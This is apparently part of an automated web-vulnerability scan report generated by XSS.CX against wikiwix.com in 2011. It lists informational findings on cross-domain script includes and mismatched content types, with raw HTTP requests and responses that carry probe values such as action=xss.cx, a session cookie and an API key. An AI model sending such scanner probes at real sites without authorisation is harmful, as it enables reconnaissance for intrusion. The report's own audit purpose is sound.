<li><a href ='http://en.wikisource.org/wiki/The Mahabharata/Book 1: Adi Parva/Section CX' target='_blank'> The Mahabharata/Book 1: Adi Parva/Sect... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/Nicene and Post-Nicene Fathers: Series II/Volume XIV/Additional Canons 3/The Canons of Carthage/Canons/Canon CX' target='_blank'> Nicene and Post-Nicene Fathers: Series... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 6/Epistles - Second Series/CX Miss S. E. Waldo' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 8/Epistles - Fourth Series/CX Margo' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Complete Works of Swami Vivekananda/Volume 9/Letters - Fifth Series/CX Badri Sah' target='_blank'> The Complete Works of Swami Vivekanand... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/The Records of the Federal Convention of 1787/Volume 3/Appendix A/CX' target='_blank'> The Records of the Federal Convention ... </a>
...[SNIP]...
<li><a href ='http://en.wikisource.org/wiki/Of Human Bondage/Chapter CX' target='_blank'> Of Human Bondage/Chapter CX </a>
...[SNIP]...
<li><a href ='http://en.wikiquote.org/wiki/X me no Xs' target='_blank'> X me no Xs </a>
...[SNIP]...
<li><a href ='http://en.wikiquote.org/wiki/An X among Ys, a Y among Xs' target='_blank'> An X among Ys, a Y among Xs </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Web Design/XML challenges' target='_blank'> Web Design/XML challenges </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Wikisphere' target='_blank'> Wikisphere </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Computer Architecture Lab/Winter2006/PolzerJahn/ThreeMicroDiscussion' target='_blank'> Computer Architecture Lab/Winter2006/P... </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Topic:Perl' target='_blank'> Topic:Perl </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Computer Architecture Lab/Summer2006/PitterDeinhart/TCMP2.0' target='_blank'> Computer Architecture Lab/Summer2006/P... </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Anatomy of the heart' target='_blank'> Anatomy of the heart </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/How to use R/Tutorials/Connecting Fortran and R' target='_blank'> How to use R/Tutorials/Connecting Fort... </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Basic cardiac anatomy' target='_blank'> Basic cardiac anatomy </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/AIEEE 2009 Q001 equations' target='_blank'> AIEEE 2009 Q001 equations </a>
...[SNIP]...
<li><a href ='http://en.wikiversity.org/wiki/Linux/linux-0.01.tar/boot/boot.s' target='_blank'> Linux/linux-0.01.tar/boot/boot.s </a>
...[SNIP]...
<li><a href ='http://en.wikinews.org/wiki/Facebook down for upgrades; multiple blogs suggest site was hacked' target='_blank'> Facebook down for upgrades; multiple... </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Tcl Programming/Print version' target='_blank'> Tcl Programming/Print version </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/X86 Assembly/Print Version' target='_blank'> X86 Assembly/Print Version </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/XML - Managing Data Exchange/SVG' target='_blank'> XML - Managing Data Exchange/SVG </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Cultural Anthropology/Social Stratification, Power and Conflict' target='_blank'> Cultural Anthropology/Social Stratific... </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/The Unicyclopedia/Hardware' target='_blank'> The Unicyclopedia/Hardware </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Using Firefox/Print' target='_blank'> Using Firefox/Print </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Algebra/Systems of linear equations' target='_blank'> Algebra/Systems of linear equations </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/Emerging Instructional Technology/Web 2.0' target='_blank'> Emerging Instructional Technology/Web ... </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/LPI Linux Certification/LPIC1 Exam 101/GNU &amp; Unix Commands' target='_blank'> LPI Linux Certification/LPIC1 Exam 101... </a>
...[SNIP]...
<li><a href ='http://en.wikibooks.org/wiki/LPI Linux Certification/Process Text Streams Using Filters' target='_blank'> LPI Linux Certification/Process Text S... </a>
...[SNIP]...
<li><a href="http://www.okawix.com/" style="border:0;"><img src="images/download-okawix.png" style="margin-left:10%;"/>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wiktionary.org/wiki/XSS">XSS</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wiktionary.org/wiki/www.siirpaylas.tr.cx">www.siirpaylas.tr.cx</a>
...[SNIP]...
<h2 style="
           direction:ltr
           "><a href="http://en.wiktionary.org/wiki/CX">CX</a>
...[SNIP]...
<li><a href="http://en.wiktionary.org/wiki/Category:English_abbreviations,_acronyms_and_initialisms" target="_blanck">English abbreviations, acronyms and initialisms</a>
...[SNIP]...
<li><a href="http://en.wiktionary.org/wiki/Category:English_initialisms" target="_blanck">English initialisms</a>
...[SNIP]...
<li><a href="http://en.wiktionary.org/wiki/Category:English_abbreviations" target="_blanck">English abbreviations</a>
...[SNIP]...
<li><a href="http://en.wiktionary.org/wiki/Category:English_abbreviations,_acronyms_and_initialisms" target="_blanck">English abbreviations, acronyms and initialisms</a>
...[SNIP]...
<li><a href="http://en.wiktionary.org/wiki/Category:ISO_3166-1" target="_blanck">ISO 3166-1</a></li><li><a href="http://en.wiktionary.org/wiki/Category:Roman_numerals" target="_blanck">Roman numerals</a>
...[SNIP]...
<li><a href="http://en.wiktionary.org/wiki/Category:Translingual_symbols" target="_blanck">Translingual symbols</a>
...[SNIP]...
<p>This project is developed by Linterweb, with the financial support of <a href="http://www.oseo.fr/"><img src="images/oseo.gif" style="width:100px;padding-left:5px;position:relative;top:10px;" alt="OSEO"></a>. It is hosted by the <a href="http://www.crihan.fr/">CRIHAN</a>
...[SNIP]...

4. Cross-domain script include  previous  next
There are 4 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


4.1. http://wikiwix.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wikiwix.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?art=true&action=&lang=en HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:53:01 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7026
Content-Type: text/html;charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:php="http://php.net/xsl"><head><meta http
...[SNIP]...
</script><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

4.2. http://wikiwix.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wikiwix.com
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php?map=true&lang=en&action=xss.cx&disp=article HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/index.php?art=true&action=xss.cx&lang=en&disp=article
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:54:42 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 5930
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:php="http://php.net/xsl"><head><meta h
...[SNIP]...
</script>

<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;sensor=false&amp;key=ABQIAAAAK5FDbIBqNjTZM2BZhS3aEhSpMqWNA3hmJyXJVY9_odrW6jPvwRQNAVvZCeX_ry7iQ3jsGbdEaz-jjw" type="text/javascript"></script>
...[SNIP]...

4.3. http://wikiwix.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wikiwix.com
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.php?art=true&action=xss.cx&lang=en&disp=article HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/?art=true&action=&lang=en
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:53:17 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=utf-8
Content-Length: 46451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:php="http://php.net/xsl"><head><meta http
...[SNIP]...
</script><script src="http://www.google.com/jsapi"></script>
...[SNIP]...

4.4. http://wikiwix.com/timeline/timeline-api.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wikiwix.com
Path:   /timeline/timeline-api.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /timeline/timeline-api.js HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/index.php?timeline=true&date=4-7&lang=en
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:55:06 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
Last-Modified: Wed, 11 Jun 2008 12:41:53 GMT
ETag: "31380fd-2070-44f635e856640"
Accept-Ranges: bytes
Content-Length: 8304
Content-Type: application/x-javascript

/*==================================================
* Timeline API
*
* This file will load all the Javascript files
* necessary to make the standard timeline work.
* It also detects the default locale.
*
* Include this file in your HTML file as follows:
*
* <script src="http://simile.mit.edu/timeline/api/scripts/timeline-api.js" type="text/javascript"></script>
...[SNIP]...

5. Content type incorrectly stated  previous
There are 3 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


5.1. http://wikiwix.com/timeline/data/4-7/en-1-4576656e7473.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://wikiwix.com
Path:   /timeline/data/4-7/en-1-4576656e7473.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains XML. However, it actually appears to contain unrecognised content.

Request

GET /timeline/data/4-7/en-1-4576656e7473.xml HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/index.php?timeline=true&date=4-7&lang=en
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:55:13 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
Last-Modified: Sun, 04 Apr 2010 23:21:09 GMT
ETag: "1ec4502-2d52-4837177a9c340"
Accept-Ranges: bytes
Content-Length: 11602
Content-Type: application/xml

<data wiki-url="http://en.wikipedia.org/wiki/" wiki-section="Events">
<event start="529" title="&#x2013; First draft of Corpus Juris Civilis (a fun..." link="http://en.wikipedia.org/wiki/Corpus_Juri
...[SNIP]...

5.2. http://wikiwix.com/timeline/data/4-7/en-2-426972746873.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://wikiwix.com
Path:   /timeline/data/4-7/en-2-426972746873.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains XML. However, it actually appears to contain unrecognised content.

Request

GET /timeline/data/4-7/en-2-426972746873.xml HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/index.php?timeline=true&date=4-7&lang=en
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:55:13 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
Last-Modified: Sun, 04 Apr 2010 23:21:09 GMT
ETag: "1ec4503-467e-4837177a9c340"
Accept-Ranges: bytes
Content-Length: 18046
Content-Type: application/xml

<data wiki-url="http://en.wikipedia.org/wiki/" wiki-section="Births">
<event start="1506" title="&#x2013; Saint Francis Xavier , Spanish co-founder o..." link="http://en.wikipedia.org/wiki/Francis_Xa
...[SNIP]...

5.3. http://wikiwix.com/timeline/data/4-7/en-3-446561746873.xml  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://wikiwix.com
Path:   /timeline/data/4-7/en-3-446561746873.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains XML. However, it actually appears to contain unrecognised content.

Request

GET /timeline/data/4-7/en-3-446561746873.xml HTTP/1.1
Host: wikiwix.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wikiwix.com/index.php?timeline=true&date=4-7&lang=en
Cookie: PHPSESSID=d7117242395677beb5d674254fa22eec

Response

HTTP/1.1 200 OK
Date: Thu, 07 Apr 2011 01:55:13 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16
Last-Modified: Sun, 04 Apr 2010 23:21:09 GMT
ETag: "1ec4504-2a5d-4837177a9c340"
Accept-Ranges: bytes
Content-Length: 10845
Content-Type: application/xml

<data wiki-url="http://en.wikipedia.org/wiki/" wiki-section="Deaths">
<event start="1498" title="&#x2013; King Charles VIII of France (b. 1470) " link="http://en.wikipedia.org/wiki/Charles_VIII_of_
...[SNIP]...

Report generated by XSS.CX at Wed Apr 06 20:58:20 CDT 2011.